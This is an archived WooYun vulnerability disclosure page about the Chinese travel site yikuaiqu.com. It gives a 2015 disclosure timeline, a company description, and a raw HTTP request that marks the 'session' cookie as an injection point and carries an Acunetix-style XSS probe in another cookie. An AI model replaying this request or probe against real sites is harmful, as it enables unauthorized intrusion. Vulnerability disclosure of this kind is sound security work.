乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-15: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-10-30: 厂商已经主动忽略漏洞,细节向公众公开
一块去旅行网(Yikuaiqu.com)是国内领先的周边游预订平台,深耕在线旅游行业三年,专注向自驾、城际交通出行的白领和中高端家庭用户提供高品质周边度假、吃喝玩乐等O2O服务。 以目的地落地签约、实地考察、深度设计为旅游产品挑选标准,签约旅游产品超过8000个,主要提供中高端度假酒店、景点门票、新奇玩乐项目及周边餐饮,同时设计策划千余款热卖景酒打包产品。
http://www.yikuaiqu.com/
GET / HTTP/1.1Cookie: PHPSESSID=atqt57bmt20je9d79simlnrcf7; location={"city":"\u5317\u4eac\u5e02"%2C"cityID":36%2C"province":"\u5317\u4eac\u5e02"%2C"provinceID":2}; session=*; HMACCOUNT=5EB7367F42DA1C79; Hm_lvt_012be03af69d819cbc5f7e4471685a0c=1441970442,1441970958,1441971119,1441972408; Hm_lpvt_012be03af69d819cbc5f7e4471685a0c=1441972408; __utmt=1; __utma=58165410.469412226.1441969295.1441969295.1441969295.1; __utmb=58165410.2.10.1441969295; __utmc=58165410; __utmz=58165410.1441969295.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); HMACCOUNT=5EB7367F42DA1C79; history=1; index=1; Hm_lvt_012be03af69d819cbc5f7e4471685a0c=1441970442,1441970958,1441971119,1441972408; Hm_lpvt_012be03af69d819cbc5f7e4471685a0c=1441972408; Hm_lvt_012be03af69d819cbc5f7e4471685a0c=1441970442,1441970958,1441971119,1441972408; Hm_lpvt_012be03af69d819cbc5f7e4471685a0c=1441972408; Hm_lvt_0161c0bcc082cf312deef23af0918efb=1441969794,1441969806,1441969825; Hm_lpvt_0161c0bcc082cf312deef23af0918efb=1441969825; VERSION=2,0,0,0; history=1; BRIDGE_INVITE_0=0; BAIDUID=E48C8F1F9C7BA3DDAC5B764E1E797CE4:FG=1; BAIDUID=E48C8F1F9C7BA3DDAC5B764E1E797CE4:FG=1; BAIDUID=E48C8F1F9C7BA3DDAC5B764E1E797CE4:FG=1; BAIDUID=E48C8F1F9C7BA3DDAC5B764E1E797CE4:FG=1; BAIDUID=E48C8F1F9C7BA3DDAC5B764E1E797CE4:FG=1X-Requested-With: XMLHttpRequestReferer: http://www.yikuaiqu.com:80/Host: www.yikuaiqu.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*
cookie中的session参数
未能联系到厂商或者厂商积极拒绝
